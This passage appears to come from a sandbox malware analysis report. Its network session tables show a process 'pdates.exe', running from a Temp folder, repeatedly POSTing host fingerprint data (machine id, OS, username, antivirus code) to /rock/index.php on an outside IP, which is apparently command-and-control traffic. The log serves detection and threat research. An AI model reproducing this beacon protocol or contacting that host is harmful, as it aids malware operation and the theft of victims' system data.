Jul 27, 2023 01:33:50.594661951 CEST	3728	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:50.642767906 CEST	3728	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:50 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
172	192.168.2.5	49890	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:50.796665907 CEST	3729	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:50.843838930 CEST	3729	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:50 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
173	192.168.2.5	49891	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:50.996606112 CEST	3730	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:51.044812918 CEST	3730	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:51 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
174	192.168.2.5	49892	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:51.213378906 CEST	3731	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:51.260690928 CEST	3731	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:51 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
175	192.168.2.5	49893	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:51.422959089 CEST	3732	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:51.471189976 CEST	3732	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:51 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
176	192.168.2.5	49894	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:51.632822037 CEST	3733	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:51.681561947 CEST	3733	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:51 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
177	192.168.2.5	49895	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:51.877855062 CEST	3734	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:51.927011967 CEST	3734	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:51 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
178	192.168.2.5	49896	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:52.375495911 CEST	3735	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:52.424171925 CEST	3735	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:52 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
179	192.168.2.5	49897	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:52.591841936 CEST	3736	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:52.641124010 CEST	3736	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:52 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
18	192.168.2.5	49734	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:06.718375921 CEST	2851	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:06.769049883 CEST	2851	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:06 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
180	192.168.2.5	49898	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:52.894244909 CEST	3737	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:52.941570044 CEST	3737	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:52 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
181	192.168.2.5	49899	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:53.131997108 CEST	3738	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:53.179662943 CEST	3738	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:53 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
182	192.168.2.5	49900	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:53.739263058 CEST	3739	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:53.787466049 CEST	3739	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:53 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
183	192.168.2.5	49901	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:53.986485004 CEST	3740	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:54.035423994 CEST	3740	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:53 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
184	192.168.2.5	49902	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:55.467416048 CEST	3741	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:55.516285896 CEST	3741	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:55 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
185	192.168.2.5	49903	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:55.773277044 CEST	3742	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:55.821748018 CEST	3742	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:55 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
186	192.168.2.5	49904	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:56.051050901 CEST	3743	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:56.099695921 CEST	3743	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:56 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
187	192.168.2.5	49905	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:56.268786907 CEST	3743	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:56.316803932 CEST	3744	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:56 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
188	192.168.2.5	49906	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:56.487083912 CEST	3744	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:56.535904884 CEST	3745	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:56 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
189	192.168.2.5	49907	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:56.721050024 CEST	3745	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:56.769829988 CEST	3746	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:56 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
19	192.168.2.5	49735	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:06.972616911 CEST	2852	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:07.021028042 CEST	2852	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:06 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
190	192.168.2.5	49908	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:56.934418917 CEST	3746	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:56.982660055 CEST	3747	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:56 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
191	192.168.2.5	49909	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:57.137928963 CEST	3747	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:57.185874939 CEST	3748	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:57 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
192	192.168.2.5	49910	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
